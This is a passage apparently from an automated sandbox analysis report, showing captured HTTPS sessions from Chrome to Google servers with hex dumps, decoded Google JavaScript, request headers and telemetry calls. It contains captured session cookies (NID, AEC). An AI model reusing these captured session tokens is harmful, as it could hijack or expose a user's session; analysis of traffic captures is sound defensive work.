2024-09-26 15:55:30 UTC	1390	IN	Data Raw: a2 a2 f0 a5 2e ed 2d ac 3e a8 27 89 04 29 28 2a 06 44 65 f2 57 5f 0f b0 fd ae 31 cd 60 2d b2 a5 56 ff 00 0f 97 7d ef 16 34 a2 ea 56 f6 85 19 5d 52 bf 37 72 64 22 3b 27 18 60 66 4f 09 40 4d 08 07 a6 fd 48 53 d5 a6 c9 81 1f 87 dd 75 c2 5d 4d b7 53 d3 50 d5 41 03 53 a2 1d 66 b8 c2 4f 1b 8d 3f 8c dd 71 95 db 8c 25 dc 5e 34 fe 32 17 13 d5 e4 93 9e 65 b5 46 b0 51 10 a0 7e 4a 64 55 6b 20 81 55 d7 12 1e 15 a3 e0 e5 bc 26 14 b6 0c 68 b3 67 e8 b4 7c 10 2d e0 b0 a7 58 56 5a e6 49 e6 6b 0f 42 6f 14 28 9a 9c a5 30 cf 09 61 35 d1 e2 40 79 f8 d9 6f 03 8c 45 b2 1d 56 5e cb 49 cd 0c 72 fc 5e 9b c0 fc d6 73 c9 2f 77 98 69 61 c7 f8 99 2f 4b 53 42 0f 9a 8f 0f 9a ac da 08 34 c2 94 78 91 e1 b2 e3 b2 d7 e1 f4 36 75 b5 93 7a b5 26 14 fd 8e 1f 78 1f 45 d6 73 5d be a9 d6 15 5c 96 Data Ascii: .->')(*DeW_1`-V}4V]R7rd";'`fO@MHSu]MSPASfO?q%^42eFQ~JdUk U&hg\|-XVZIkBo(0a5@yoEV^Ir^s/wia/KSB4x6uz&xEs]\
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 69 b0 66 aa 9c ab 5e 40 07 df 5f dc 32 ca cb 7b 41 7c ae aa 9a 2b 39 4a 14 0f 2d 13 8c 24 a5 4d 64 a8 0e c4 8d 10 37 ec 80 22 c9 e0 1f 45 d7 1c b7 ec 99 11 ff 00 4a 7a 9d ff 00 28 75 94 e2 c9 fb de 35 76 35 9f aa 49 f9 a7 e2 40 1c 5e 30 ec f3 f5 5c ce 64 94 f3 2d ca 35 80 f1 b9 d1 28 22 a4 14 46 5b a1 2f a1 3b ad 27 2c 35 72 f6 1a 61 66 88 f6 5a 9e 09 94 70 58 22 a7 1c 83 5f a2 b2 cf 32 4f 37 48 77 4a 9c 66 77 64 46 64 cb 34 22 0a 11 ea 80 f0 f3 56 17 f2 f7 9c b9 48 2b 35 e6 b5 3c cf fd b7 18 9e df aa cc 11 96 6a 4b de e5 a7 85 3f e2 7d 94 49 72 08 3e ea 3a 94 89 73 60 aa 0e 8f cd 47 8a 14 f4 d2 2a b0 40 eb 07 cd 75 d9 6c f0 e5 b8 2c de c3 cb 64 c2 2a 48 ce 96 c6 90 17 42 0d 2e fc d3 af 3f 57 24 26 9a 86 c9 ac df 24 02 05 32 db 29 89 d5 b0 ba 8a 2c 2e aa Data Ascii: if^@_2{A\|+9J-$Md7"EJz(u5v5I@^0\d-5("F[/;',5rafZpX"_2O7HwJfwdFd4"VH+5<jK?}Ir>:s`G@ul,dHB.?W$&$2),.
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 2e af 7e 1e bf de 7f f1 b7 cd 51 7a 2b ef 87 83 a9 e2 27 a4 91 07 69 52 b5 b4 14 cb e9 95 d7 9a 34 f7 47 4a 09 ca 9c 62 84 22 0f ba 83 aa 03 d0 83 dd 31 2d aa 4b a5 2b 2e a4 e0 39 6f b9 4a 47 48 a6 ea 2e a6 e1 d7 5c 0c af 34 86 f3 2c 78 75 ab bf aa f3 9c b6 1a 15 df 99 ff 00 b9 71 19 a6 5f 2b cb e8 92 af 99 6f 5b d2 13 64 09 08 8a 91 b7 9a 8a d1 77 3a 16 cb 0e 5a c6 03 ac 09 3e cb 20 c8 0e 83 7f 25 b0 11 4d da 98 b3 e5 9b 9f fc 82 09 6f a2 60 21 be aa 04 d3 65 0c 39 95 ec e0 75 72 3f 14 26 f0 a0 8c b3 f9 20 3c 9c 7b 0b b9 6f 11 fe 12 b2 9a 3a 56 af 8f 13 c0 f1 03 4c 85 65 00 dc ec 96 bd cc 35 30 35 94 5b 52 87 90 80 6a 77 92 93 1a 85 49 f1 ff 00 8c 20 4f b2 9d 50 01 6b 66 ad f4 5d 72 5b 4c 38 fb 26 51 6c 81 30 9d 4f ba 4c 32 3e c9 84 37 50 0d d3 c4 d2 4e Data Ascii: .~Qz+'iR4GJb"1-K+.9oJGH.\4,xuq_+o[dw:Z> %Mo`!e9ur?& <{o:VLe505[RjwI OPkf]r[L8&Ql0OL2>7PN
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: f2 c9 a2 c4 ec b4 10 5c e2 a9 be 1e 70 0e c6 6d 2d 24 c1 27 75 78 09 a3 d4 dd 37 6b 58 63 66 4f ed 97 3e 97 27 9a 90 40 a5 06 96 db 34 ab 0a a0 76 aa 11 d0 e2 14 d9 cd 9d f6 28 30 50 e2 9f e2 07 ff 00 09 83 de b3 f4 59 d1 f2 57 7f 10 17 57 80 3c 37 33 e6 a9 c9 cd 25 be 49 3b bb 4b 6f 0e 3e ad 43 99 07 55 20 a9 24 ee a2 3b 28 19 41 9d 56 83 e1 f8 fb ae 36 6b d6 24 7b 2c fd cb 7a 95 ef c3 c4 53 8e cf 36 9f aa 9d ad a0 b6 67 54 ae e7 65 0a 4c 20 26 d8 a0 c7 e1 45 5f da 81 25 07 54 07 a6 00 77 7f a2 88 2e 69 cd 71 b2 23 bd bb a2 41 6c 05 27 1c fc 3d 88 41 22 2c df 54 c7 32 2b cb 76 e8 a2 ec 72 c5 bf a9 c6 98 04 94 bf aa 9c 42 d2 f7 c3 61 a4 92 02 91 fe 49 27 a1 a7 82 f4 b5 01 95 6b ea 98 8c b6 4b d2 d0 57 1d 17 5a ee 0c 87 70 3c 39 a6 e5 83 4d 16 47 47 79 2d Data Ascii: \pm-$'ux7kXcfO>'@4v(0PYWW<73%I;Ko>CU $;(AV6k${,zS6gTeL &E_%Tw.iq#Al'=A",T2+vrBaI'kKWZp<9MGGy-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.16	49766	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	1853	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=6KcQD-DCOfwRwfuOQLqsCzAUJU8k-iB9YwwFvcmpYUrmT-aHqe4PSNibvvpIkBpozbJIJI-v9_gESduPkkQlck55ADmg5cE9fHUaLwta4beFwdGVUm5zcL1RSzLKJg-VgLu4GE6dK63vW0eMz5cLTFXR7tT0ATtzr7WhodeQZxheX1xtXdL_83w649qhq4-0ZM-Ufd-SBZ6X
2024-09-26 15:55:30 UTC	829	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 24979 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:13 GMT Expires: Fri, 26 Sep 2025 08:56:13 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25156 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:30 UTC	561	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 4b 24 63 3d 5f 2e 45 64 28 22 50 31 30 4f 77 66 22 2c 5b 5f 2e 67 71 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 31 30 4f 77 66 22 29 3b 0a 76 61 72 20 47 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 69 73 2e 6b 61 3d 74 68 69 73 2e 67 65 74 44 61 74 61 28 22 63 6d 65 70 22 29 2e 4b 62 28 29 3b 74 68 69 73 2e 4f 62 3d 61 2e 73 65 72 76 69 63 65 2e 4f 62 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 54 64 2e 74 64 61 7d 3b 5f 2e 43 28 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.K$c=_.Ed("P10Owf",[_.gq]);}catch(e){_._DumpException(e)}try{_.w("P10Owf");var GD=function(a){_.A.call(this,a.Ma);this.ka=this.getData("cmep").Kb();this.Ob=a.service.Ob;this.data=a.Td.tda};_.C(
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 4a 75 28 29 29 26 26 28 28 63 3d 61 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 30 3a 63 2e 4a 75 28 29 29 26 26 28 62 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 62 2e 4a 75 28 29 29 21 3d 3d 61 2e 64 61 74 61 2e 4a 75 28 29 7c 7c 61 2e 4f 62 2e 6b 61 28 29 2e 6f 61 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 32 29 2e 6c 6f 67 28 21 30 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 29 2e 6c 6f 67 28 21 30 29 3b 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 54 78 63 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 Data Ascii: Ju())&&((c=a.data)==null?0:c.Ju())&&(b==null?void 0:b.Ju())!==a.data.Ju()\|\|a.Ob.ka().oa(a.getRoot().el(),2).log(!0)};GD.prototype.Ha=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);_.nf(document,_.Txc)};GD.prototype.Ca=function(a){this.Ob.ka().ka(a.qb.el()
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 61 29 3b 42 35 63 28 74 68 69 73 29 7d 3b 0a 76 61 72 20 42 35 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 6b 75 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 29 3b 5f 2e 79 35 63 28 22 66 73 22 29 3b 61 2e 6b 61 3f 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 51 78 63 2c 61 2e 64 61 74 61 2e 4c 63 28 29 29 3a 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 50 78 63 2c 61 2e 64 61 74 61 29 3b 5f 2e 6e 66 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 5f 2e 4a 77 62 29 3b 5f 2e 77 77 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 22 68 69 64 65 5f 70 6f 70 75 70 22 29 3b 61 2e 74 61 26 26 61 2e 74 72 69 67 67 65 72 28 5f 2e 78 35 63 29 7d 3b 5f 2e 4c 28 41 35 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 79 4d 31 59 4a 65 22 Data Ascii: a);B5c(this)};var B5c=function(a){_.ku(a.getRoot().el());_.y5c("fs");a.ka?_.nf(document,_.Qxc,a.data.Lc()):_.nf(document,_.Pxc,a.data);_.nf(window.document.body,_.Jwb);_.ww(a.getRoot().el(),"hide_popup");a.ta&&a.trigger(_.x5c)};_.L(A5c.prototype,"yM1YJe"
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 64 22 29 2e 65 6c 28 29 3b 63 26 26 62 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 6d 2e 55 38 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 75 61 7d 3b 0a 5f 2e 6d 2e 69 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 65 66 69 78 3d 22 22 7d 3b 76 61 72 20 4f 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 43 50 28 29 3b 5f 2e 46 61 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 2e 6b 61 28 63 29 3b 69 66 28 64 2e 69 73 53 65 6c 65 63 74 65 64 28 29 26 26 64 2e 69 73 45 6e 61 62 6c 65 64 28 29 29 73 77 69 74 63 68 28 64 2e 67 65 74 54 79 70 65 28 29 29 7b 63 61 73 65 20 32 3a 50 6e 63 28 61 29 3b 64 2e 71 72 28 21 30 29 3b 61 2e 77 61 3d 63 3b 62 72 Data Ascii: d").el();c&&b.push(c);return b};_.m.U8c=function(){return this.kua};_.m.iuc=function(){this.prefix=""};var Onc=function(a){var b=a.CP();_.Fa(b,function(c){var d=a.ka(c);if(d.isSelected()&&d.isEnabled())switch(d.getType()){case 2:Pnc(a);d.qr(!0);a.wa=c;br
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 2e 6d 3d 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 54 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 61 7d 3b 5f 2e 6d 2e 68 39 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 61 7d 3b 5f 2e 6d 2e 64 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 61 7d 3b 0a 5f 2e 6d 2e 4e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 54 71 28 29 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 6b 61 28 61 29 2e 67 65 74 43 6f 6e 74 65 6e 74 28 29 3a 22 22 7d 3b 5f 2e 6d 2e 6b 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 43 50 28 29 5b 30 5d 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 4a 57 28 61 29 3a 6e 75 Data Ascii: .m=_.sz.prototype;_.m.Tq=function(){return this.wa};_.m.h9c=function(){return this.Ca};_.m.duc=function(){return this.oa};_.m.NCa=function(){var a=this.Tq();return a?this.ka(a).getContent():""};_.m.kLb=function(){var a=this.CP()[0];return a?this.JW(a):nu
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 7d 3b 5f 2e 6d 2e 65 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 61 3d 3d 3d 6e 75 6c 6c 26 26 51 6e 63 28 74 68 69 73 2c 74 68 69 73 2e 43 50 28 29 5b 30 5d 29 7d 3b 5f 2e 6d 2e 66 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4b 6e 63 29 7d 3b 5f 2e 6d 2e 67 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4c 6e 63 29 3b 51 6e 63 28 74 68 69 73 2c 6e 75 6c 6c 29 7d 3b 5f 2e 6d 2e 68 75 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 55 6e 63 28 61 29 29 26 26 51 6e 63 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 0a 5f 2e 6d 2e 57 6a 3d 66 75 6e Data Ascii: };_.m.euc=function(){this.oa===null&&Qnc(this,this.CP()[0])};_.m.fuc=function(){var a=this.getRoot().el();_.Je(a,_.Knc)};_.m.guc=function(){var a=this.getRoot().el();_.Je(a,_.Lnc);Qnc(this,null)};_.m.huc=function(a){(a=Unc(a))&&Qnc(this,a,!0)};_.m.Wj=fun
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 2c 64 3d 5f 2e 4e 63 62 28 64 2c 62 3f 2d 61 2d 31 3a 2d 61 29 2c 61 3d 64 2e 66 69 6e 64 49 6e 64 65 78 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 29 3b 72 65 74 75 72 6e 20 64 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 26 26 28 74 68 69 73 2e 4f 61 28 61 29 2c 28 61 3d 74 68 69 73 2e 4a 57 28 61 29 29 26 26 61 2e 66 6f 63 75 73 28 29 29 7d 3b 0a 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2e 4f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 29 7b 76 61 72 20 63 3d 5f 2e 51 6c 2e 67 65 74 53 69 7a 65 28 74 68 69 73 2e 6d 65 6e 75 29 3b 69 66 28 63 2e 68 65 69 67 68 74 3c 74 68 69 73 2e 6d 65 6e 75 2e 73 63 Data Ascii: return c===e}),d=_.Ncb(d,b?-a-1:-a),a=d.findIndex(function(e){return c===e}));return d};_.sz.prototype.Ha=function(a){a&&(this.Oa(a),(a=this.JW(a))&&a.focus())};_.sz.prototype.Oa=function(a,b){if(a){var c=_.Ql.getSize(this.menu);if(c.height<this.menu.sc
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 50 7d 29 3b 5f 2e 4c 28 5f 2e 73 7a 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6d 4a 36 30 6a 62 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 50 37 63 7d 29 3b 5f 2e 67 72 28 5f 2e 4d 6e 63 2c 5f 2e 73 7a 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 75 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 6b 29 7b 76 61 72 20 6c 3d 5f 2e 24 77 62 28 63 29 2c 70 3d 5f 2e 51 6c 2e 67 65 74 42 6f 75 6e 64 73 28 61 29 2c 72 3d 5f 2e 51 6c 2e 42 5f 28 61 29 3b 72 26 26 5f 2e 76 41 61 28 70 2c 5f 2e 74 41 61 28 72 29 29 3b 5f 2e 51 6c 2e 48 50 64 28 70 2c Data Ascii: tion(){return this.CP});_.L(_.sz.prototype,"mJ60jb",function(){return this.P7c});_.gr(_.Mnc,_.sz);_.y();}catch(e){_._DumpException(e)}try{_.yu=function(a,b,c,d,e,f,g,h,k){var l=_.$wb(c),p=_.Ql.getBounds(a),r=_.Ql.B_(a);r&&_.vAa(p,_.tAa(r));_.Ql.HPd(p,
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 26 26 28 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 69 6e 28 65 2e 72 69 67 68 74 2d 67 2e 78 2c 68 2b 63 2e 77 69 64 74 68 2d 65 2e 6c 65 66 74 29 2c 63 2e 77 69 64 74 68 3d 4d 61 74 68 2e 6d 61 78 28 63 2e 77 69 64 74 68 2c 30 29 2c 64 7c 3d 34 29 7d 67 2e 78 2b 63 2e 77 69 64 74 68 3e 0a 65 2e 72 69 67 68 74 26 26 66 26 31 26 26 28 67 2e 78 3d 4d 61 74 68 2e 6d 61 78 28 65 2e 72 69 67 68 74 2d 63 2e 77 69 64 74 68 2c 65 2e 6c 65 66 74 29 2c 64 7c 3d 31 29 3b 66 26 32 26 26 28 64 7c 3d 28 67 2e 78 3c 65 2e 6c 65 66 74 3f 31 36 3a 30 29 7c 28 67 2e 78 2b 63 2e 77 69 64 74 68 3e 65 2e 72 69 67 68 74 3f 33 32 3a 30 29 29 3b 67 2e 79 3c 65 2e 74 6f 70 26 26 66 26 34 26 26 28 67 2e 79 3d 65 2e 74 6f 70 2c 64 7c Data Ascii: +c.width>e.right&&(c.width=Math.min(e.right-g.x,h+c.width-e.left),c.width=Math.max(c.width,0),d\|=4)}g.x+c.width>e.right&&f&1&&(g.x=Math.max(e.right-c.width,e.left),d\|=1);f&2&&(d\|=(g.x<e.left?16:0)\|(g.x+c.width>e.right?32:0));g.y<e.top&&f&4&&(g.y=e.top,d\|
2024-09-26 15:55:30 UTC	1390	IN	Data Raw: 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 76 75 3d 5f 2e 4a 28 22 42 55 59 77 56 62 22 29 3b 5f 2e 47 77 62 3d 5f 2e 4a 28 22 4c 73 4c 47 48 66 22 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 44 50 72 65 45 22 29 3b 0a 5f 2e 7a 75 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 6b 61 3d 31 3b 74 68 69 73 2e 6f 66 66 73 65 74 59 3d 74 68 69 73 2e 6f 66 66 73 65 74 58 3d 30 3b 74 68 69 73 2e 4b 61 3d 74 68 69 73 2e 4e 61 3d 74 68 69 73 2e 43 61 3d 21 31 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 6a 73 64 61 74 61 2e 41 35 63 3b Data Ascii: e){_._DumpException(e)}try{_.vu=_.J("BUYwVb");_.Gwb=_.J("LsLGHf");}catch(e){_._DumpException(e)}try{_.w("DPreE");_.zu=function(a){_.A.call(this,a.Ma);var b=this;this.ka=1;this.offsetY=this.offsetX=0;this.Ka=this.Na=this.Ca=!1;this.data=a.jsdata.A5c;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.16	49768	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:29 UTC	1963	OUT	POST /gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=webhp&t=all&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&adh=&cls=0.000046949291965270124&ime=1&imeae=0&imeap=0&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=203802&ucb=203802&ts=204102&mem=ujhs.10,tjhs.14,jhsl.2173,dm.8&nv=ne.1,feid.bbb3d774-59be-491a-a995-04abadd6c81b&net=dl.1500,ect.3g,rtt.300&hp=&sys=hc.4&p=bs.true&rt=hst.35,cbt.97,prt.1023,afti.1476,aft.1476,aftqf.1477,xjses.2440,xjsee.2491,xjs.2491,lcp.1481,fcp.1017,wsrt.2066,cst.677,dnst.9,rqst.730,rspt.361,sslt.677,rqstt.1697,unt.1010,cstt.1020,dit.3112&zx=1727366125369&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:30 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-xTK8F1CIw6AX44TO8IEcCA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:29 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.16	49770	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
